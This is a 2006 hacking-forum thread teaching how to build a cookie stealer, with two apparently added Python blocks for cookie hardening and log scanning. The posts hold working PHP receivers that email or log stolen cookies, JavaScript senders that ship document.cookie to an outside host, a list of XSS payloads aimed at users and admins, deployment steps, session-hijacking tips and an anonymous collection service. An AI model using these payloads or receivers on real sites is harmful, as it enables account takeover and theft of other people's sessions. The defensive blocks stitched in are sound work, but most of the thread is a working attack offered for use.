How To Make A Cookie Stealer - Critical Security.NET


How To Make A Cookie Stealer

#1 Freakwolfe (Big Bad Wolfe; Group: Members; Posts: 1,476; Joined: 06-October 05; Gender: Male; Location: Austria)

Posted 14 February 2006 - 01:34 AM

I've explained this process several times to several different people, so I thought I'd just make one thread for it. If you have any questions or additional information, post it here.

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essence, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

<?php                                                               // line 1
$cookie = $HTTP_GET_VARS["cookie"];                                 // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie);          // line 3
?>                                                                  // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

<?php                                                               // line 1
$cookie = $HTTP_GET_VARS["cookie"];                                 // line 2
$file = fopen('cookielog.txt', 'a');                                // line 3
fwrite($file, $cookie . "\n\n");                                    // line 4
?>                                                                  // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and Javascript, so you have to be sure that your environment supports those two. Here is an example of a sender.

<script language="Javascript">                                                                   // Line 1
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;            // Line 2
</script>                                                                                        // Line 3
Line 1 tells the browser that the following chunk of code is to be interpreted as Javascript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as Javascript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

You can trick the victim into clicking a link which activates the sender. For example:
<a href="java script:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>
(remove the space in "javascript")

Another method I discovered is putting...
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
...into my user-agent.



Free PHP hosts:
http://www.0php.com/..._webhosting.php
http://www.free-webh...-webhosting.php


Do not ask what a cookie stealer is or how to use one; such questions have already been answered in this thread. Please read the entire thread before asking a question. If you have thoroughly read the thread and are still having difficulty, post your questions intelligently. Otherwise, I will close the thread again.
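Seen from the side of the site the sender gets planted on, the tutorial above rests on two conditions: document.cookie can only read cookies that were set without the HttpOnly flag, and the sender only executes if user-supplied text is inserted into HTML unescaped. The following is an added example written for this thread, not code from the post or from any forum software; the function names are hypothetical, the cookie name "sessionid" is borrowed from later in the thread, the sender payload is the exact one quoted in the post, and the SameSite attribute needs Python 3.8 or newer.

```python
"""Server-side controls against the sender/receiver pair described above.

Added example for this thread (not code from the original post). Function
names are hypothetical; "sessionid" is the cookie name used later in the
thread; SENDER_PAYLOAD is the sender quoted in the post, used as test input.
"""
import html
import secrets
from http.cookies import SimpleCookie

# The sender from the post above, used here only as input to escape_for_html().
SENDER_PAYLOAD = ('<script>document.location="http://www.host.com/mysite/'
                  'stealer.php?cookie=" + document.cookie;</script>')


def hardened_session_cookie(name: str = "sessionid") -> str:
    """Return a Set-Cookie header value for an opaque random session token.

    The value carries nothing reusable on its own (no user id, no password
    hash), HttpOnly keeps it out of document.cookie, Secure keeps it off
    plaintext HTTP and SameSite=Lax limits cross-site sending.
    """
    jar = SimpleCookie()
    jar[name] = secrets.token_urlsafe(32)
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"   # Python 3.8+
    jar[name]["path"] = "/"
    return jar[name].OutputString()


def audit_set_cookie(header_value: str) -> list:
    """List the protections missing from a Set-Cookie header value.

    Run it over a server's real responses to find session cookies that a
    sender like the one above could still read through document.cookie.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    missing = []
    for name, morsel in jar.items():
        for flag in ("httponly", "secure", "samesite"):
            if not morsel[flag]:
                missing.append(f"{name}: missing {flag}")
    return missing


def escape_for_html(user_text: str) -> str:
    """Escape user-supplied text before placing it in an HTML document.

    After escaping, '<script>' is the literal text '&lt;script&gt;', which the
    browser renders instead of executing, so a planted sender never runs.
    """
    return html.escape(user_text, quote=True)


if __name__ == "__main__":
    print(hardened_session_cookie())
    print(audit_set_cookie("sessionid=abc123; Path=/"))
    print(escape_for_html(SENDER_PAYLOAD))
```

audit_set_cookie() reports an unflagged cookie such as "sessionid=abc123; Path=/" as missing all three attributes and reports nothing for the header hardened_session_cookie() produces; escape_for_html() turns the quoted sender into inert text with no "<" or ">" left in it.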

#2 Lockdown (Posting Prodigy; Group: Members; Posts: 926; Joined: 18-December 05; Gender: Male; Location: _108_)

Posted 14 February 2006 - 02:03 AM

Perhaps you should include an explanation of what can be done once you have the victim's cookies... Realistic 9 (Crappy soft right) really didn't go into enough detail about that.

It's a good tutorial, but it's assuming the reader knows what the hell to do with cookies once he/she has them.

#3 Freakwolfe (Big Bad Wolfe; Group: Members; Posts: 1,476; Joined: 06-October 05; Gender: Male; Location: Austria)

Posted 14 February 2006 - 02:33 AM

If they don't know what to do with cookies, then why would they be interested in making a cookie stealer?

I might add a bit about cookie injection later. Until then, if someone else wants to post about it, go ahead.

#4 charlie(cph) (Critical Member; Group: Members; Posts: 151; Joined: 06-October 05)

Posted 15 February 2006 - 07:15 PM

If you log user agents, escape " so it appears as /".

#5 Arkan (Member; Group: Members; Posts: 24; Joined: 05-October 05)

Posted 16 February 2006 - 01:52 AM

Attach it in a Flash Sig or Image...something like that?

#6 digi7al64 (Pirate; Group: Administrators; Posts: 1,270; Joined: 06-October 05; Gender: Male)

Posted 17 February 2006 - 03:31 AM

Nice article Freakwolfe.

Over time I will add other code snippets into the post on all the different types of scripts/syntax you can use for cookie stealing.

General HTML allowed posting
<script>document.location="http://www.site.com/?" + document.cookie;</script>
---
<a href="http://www.xss.com" onmouseover="java script:document.images[1].src='http://www.site.com?'+document.cookie;">xss</a>
---
<img src="java script:document.images[1].src='http://www.site.com?'+document.cookie;">
---
<style>body {background:url(java script:document.images[1].src="http://www.site.com?"+document.cookie)}</style>
---
<meta http-equiv="refresh" content="666;url=java script:alert('xss');">
---
<frame src=http://www.site.com/?<script>win.open("http://www.site.com/?"+document.cookie</script>>
---
<xml src="java script:document.location='http://www.site.com?'+document.cookie">
---
<div onmouseover="java script:document.location='http://www.site.com?'+document.cookie">
---
<link rel="stylesheet" href="java script:document.location='http://www.site.com?'+document.cookie">
---
<style type="text/javascript">document.location='http://www.site.com?'+document.cookie</style>


Targeting Admins
useragent = <script>alert('xss')</script>
---
referrer = <script>alert('xss')</script>
---
cookie sessionid=<script>alert('xss')</script>
---
http://www.xss.com?post=<script>alert(xss')</script>


Also, regarding query strings etc., i.e. "cookie.php?cookie=value": just use "cookie.php?value" instead and the '$QUERY_STRING' value to retrieve it.

Finally, when logging user data, get all the info you can: IP, agent and OS. Remember, it doesn't matter how secure the forum is if you can compromise the user's system.
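The vectors listed in post #1 and in the post above all leave a trace in the targeted site's own access log: the planted sender shows up in a query string, in the User-Agent or in the Referer, either plain or URL-encoded. The following is an added example written for this thread, not code from any post, that scans Apache/nginx "combined" log lines for those indicators; the log lines, IP addresses and host names (forum.example, attacker.example) are constructed for the example and the function names are hypothetical.

```python
"""Scan web-server access-log lines for the injection vectors discussed in
this thread: script tags, javascript: URLs, inline event handlers and
document.cookie in the query string, the User-Agent or the Referer.

Added example for this thread (not code from the posts). The sample log
lines, addresses and host names are constructed; function names are
hypothetical.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators drawn from the payloads quoted in this thread; matched after
# URL-decoding so %3Cscript%3E and <script> are treated alike.
INDICATORS = (
    ("document.cookie", re.compile(r"document\s*\.\s*cookie", re.I)),
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("javascript-url", re.compile(r"java\s*script\s*:", re.I)),
    ("event-handler", re.compile(r"\bon(mouseover|load|error|click)\s*=", re.I)),
)


def fully_decode(value: str) -> str:
    """URL-decode until the text stops changing, so double-encoded payloads
    (%253Cscript%253E) are unwrapped as well."""
    previous = None
    while previous != value:
        previous, value = value, unquote_plus(value)
    return value


def scan_line(line: str) -> list:
    """Return one finding per request field (path, referer, agent) that
    carries at least one indicator; an unparseable line yields nothing."""
    match = COMBINED_RE.match(line)
    if not match:
        return []
    findings = []
    for field in ("path", "referer", "agent"):
        text = fully_decode(match.group(field))
        hits = [name for name, pattern in INDICATORS if pattern.search(text)]
        if hits:
            findings.append({"ip": match.group("ip"), "time": match.group("time"),
                             "field": field, "indicators": hits})
    return findings


def scan_access_log(lines) -> list:
    """Scan an iterable of log lines and collect all findings in order."""
    findings = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


# Constructed sample log: one clean request, then the three vectors from the
# thread (URL-encoded query string, User-Agent, Referer).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Feb/2006:01:34:00 +0000] "GET /forum/index.php?showtopic=1 HTTP/1.1" '
    '200 5120 "http://forum.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Feb/2006:02:03:00 +0000] "GET /forum/post.php?msg=%3Cscript%3E'
    'document.location%3D%22http%3A%2F%2Fattacker.example%2Fstealer.php%3Fcookie%3D%22'
    '%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Feb/2006:02:05:00 +0000] "GET /forum/ HTTP/1.1" 200 812 "-" '
    '"<script>document.location=\'http://attacker.example/cookie.php?\'+document.cookie;</script>"',
    '198.51.100.7 - - [14/Feb/2006:02:07:00 +0000] "GET /forum/ HTTP/1.1" 200 812 '
    '"http://forum.example/?post=<script>alert(\'xss\')</script>" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

On the sample log the clean request produces nothing, the encoded query string and the User-Agent are each flagged for both document.cookie and a script tag, and the Referer is flagged for the script tag alone; feeding real log files through scan_access_log() a line at a time works the same way.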

#7 Freakwolfe (Big Bad Wolfe; Group: Members; Posts: 1,476; Joined: 06-October 05; Gender: Male; Location: Austria)

Posted 17 February 2006 - 03:49 AM

Thanks for the additional info, digi7al64. Those are some handy tips.

Typically, cheap forums log user/password information. Most of the time, the passwords are hashed. If you are lucky enough to get the user ID and password (hashed or not) the next step is rather obvious.

If you get some kind of weird pseudo-session data, you can try injecting that into your own cookie to log on as that user.

#8 spindoctor (Critical Member; Group: Members; Posts: 125; Joined: 13-December 05)

Posted 19 April 2006 - 10:06 PM

OK :) Finally managed to get the cookie stealer up and running. I am now receiving emails, as I tested the stealer out on my forum. I receive all the session IDs and hashed passwords in the email. Say if I wanted to use this to my advantage, how would I go about using this information? Now I'm this far.

#9 Freakwolfe (Big Bad Wolfe; Group: Members; Posts: 1,476; Joined: 06-October 05; Gender: Male; Location: Austria)

Posted 20 April 2006 - 03:01 AM

To change your current cookie, paste this into the URL bar (remove the space between "java" and "script"):
java script:void(document.cookie=prompt("Your cookie is currently:\n"+document.cookie,document.cookie));



Beyond that, you're on your own.

#10 spindoctor (Critical Member; Group: Members; Posts: 125; Joined: 13-December 05)

Posted 20 April 2006 - 09:33 AM

Thanks, I've also been working with the cookie editor that comes as an add-on with Firefox. That seems to be working easily for me.


Oh, and I think you should add something to the cookie script that you posted that writes to a log file

Quote

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>



to..

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>



It probably makes no difference... but shouldn't you close $file?

This post has been edited by spindoctor: 21 April 2006 - 09:05 PM


#11 pshell (Group: Guests)

Posted 24 April 2006 - 04:10 AM

I'm getting confused. :weirdsmiley:

(Just to make things clear: I have a host that supports PHP, and I am familiar with PHP.)



Now, there is a receiver and a sender, right? Well, what's this other stuff, stealer.php and cookie.php?

Ah, alas, I'm confused.

Can someone just give straight instructions on what PHP files to create, please?


^_^

This post has been edited by pshell: 24 April 2006 - 04:14 AM


#12 digi7al64 (Pirate; Group: Administrators; Posts: 1,270; Joined: 06-October 05; Gender: Male)

Posted 24 April 2006 - 04:18 AM

OK, this is real simple.

1. Copy and paste this script into textpad/notepad.
2. Save as cookie.php.
3. Upload to your server.
4. Create an empty txt file called log.txt.
5. Upload to your server in the same directory as cookie.php, ensuring it has write permissions.
6. Inject your cookie stealer script into whatever. An example would be
<script>document.location='http://www.yoururl.com/cookie.php?'+document.cookie;</script>

7. Wait for the cookie data to come rolling in.

NOTICE: I have not used any querystring key/value to get the cookie; I simply make the cookie data the querystring.

This post has been edited by digi7al64: 21 March 2007 - 07:36 AM


#13 pshell (Group: Guests)

Posted 24 April 2006 - 05:10 PM

I'm testing it out on myself and it's not writing down any cookie info.

It's just putting an IP address, a referral and a timestamp.
For the cookie info it's just putting one or two of these small box things from a weird font.

This is the code I'm using.

indexx.htm (The sender)
<script language="Javascript">
document.location="http://somesite.com/cookie.php?cookie=" + document.cookie;
</script> // Line 3

then the sender sends them to:

Cookie.php (the receiver)
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$ip = getenv ('REMOTE_ADDR');
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
header ("Location: /index.php");  //<-------After it redirects to another page.
?>

This post has been edited by pshell: 24 April 2006 - 05:20 PM


#14 Freakwolfe (Big Bad Wolfe; Group: Members; Posts: 1,476; Joined: 06-October 05; Gender: Male; Location: Austria)

Posted 24 April 2006 - 06:37 PM

There isn't going to be a cookie if you don't have one to begin with. Set your cookie in the HTML file before the stealer is activated.

#15 Fonzarelli (Group: Guests)

Posted 03 May 2006 - 07:30 PM

NOOB HERE! 8)

Just few quick questions...

OK, so I've tried to follow digi7al64's guide...

I've created the cookie.php as he said and uploaded it in my Awardspace root folder.

I've also created log.txt

Then I've tried this:

to put the actionscript in my flash movie so it can do its work when viewed.

getUrl("java script:document.location='http://myweb.awardspace.us/cookie.php?'+document.cookie;");


getUrl("java script:document.location='http://myweb.awardspace.us/cookie.php?'cookie=+document.cookie;");


I've tried both of those lines but my log.txt remains like this:

IP: 123.456.789.999 | PORT: 0000 | HOST:  |  Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TCom_MAX201b) | METHOD:  | REF:  | DATE: Wednesday 03rd of May 2006 06:01:06 PM | COOKIE:


So, any help's welcome!

:whistle:

#16 (Group: Guests)

Posted 05 May 2006 - 11:15 AM

I posted this in the wrong place yesterday, whoops, then saw this thread...

I'm working on a cross-site script on a vulnerable login.jsp page.
I'm using
http://www.victimpag...ge=...</script>

I'm catching it with this code

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time:
' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /real1.html");
?>

http://www.myserver....=20060504143001


But once the script gets to saving the # symbol it stops, and all I get
in the text file is

Cookie: Email=myemail@gmail.com; Username=correctusername;
A=2; G=0; Password=<br> IP: correct ip here<br> Date and Time: 4 May,
2006, 4:30 pm<br> Referer: <br><br><br>

Is there any way I could just tell the script to convert everything to
a string and save it, or maybe, since I know what's being passed, could I
just set it up to expect the password field to be characters?

I can do an alert(document.cookie) in the script and it shows the password
as having two # symbols, as in ##68416765539080509

any ideas?

Other code I've tried with it is

<?php
$cookie = $HTTP_GET_VARS["c"];
$ip = getenv ('REMOTE_ADDR');
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
header ("Location: /index.php"); //<-------After it redirects to another page.
?>

<?php
$f = fopen("log.txt", "a");
fwrite($f, "IP: {$_SERVER['REMOTE_ADDR']} Ref: {$_SERVER['HTTP_REFERER']} Cookie: {$HTTP_GET_VARS['c']}\n");
fclose($f);
?>

But yet again the same problem: it doesn't store anything after the #.

#17 digi7al64 (Pirate; Group: Administrators; Posts: 1,270; Joined: 06-October 05; Gender: Male)

Posted 08 May 2006 - 12:51 AM

Use this to get the cookie data instead.
$cookie = $_SERVER['QUERY_STRING'];

In your request you are only asking for "c" value whereas this will take the entire querystring.

As for why yours doesn't work: ? and & = query string, # = a named anchor on the page, so it will by default stop the value there anyway.

#18 (Group: Guests)

Posted 08 May 2006 - 10:38 AM

Already tried $_SERVER['QUERY_STRING']; and the same problem :( Someone on another forum suggested $_POST to get the data, but I'm not the best at PHP and am still reading up on what the POST one does.

#19 Sid (Captain; Group: Administrators; Posts: 3,244; Joined: 05-October 05; Gender: Male; Location: London, UK; Interests: Things besides computers exist?)

Posted 19 May 2006 - 01:18 AM

I've cleared this thread of some pointless posts. I want to add something though. One problem with stealing cookies is that you have to give away your domain name (to send the cookies to that place). Well, not any more. Have a look at http://ccl.whiteacid.org/ and you'll see you can create an account there and have them sent there which keeps you anonymous.

#20 A Spectator (Group: Guests)

Posted 25 May 2006 - 05:24 AM

Cool, I'm trying this =D

This post has been edited by A Spectator: 31 May 2006 - 12:12 AM

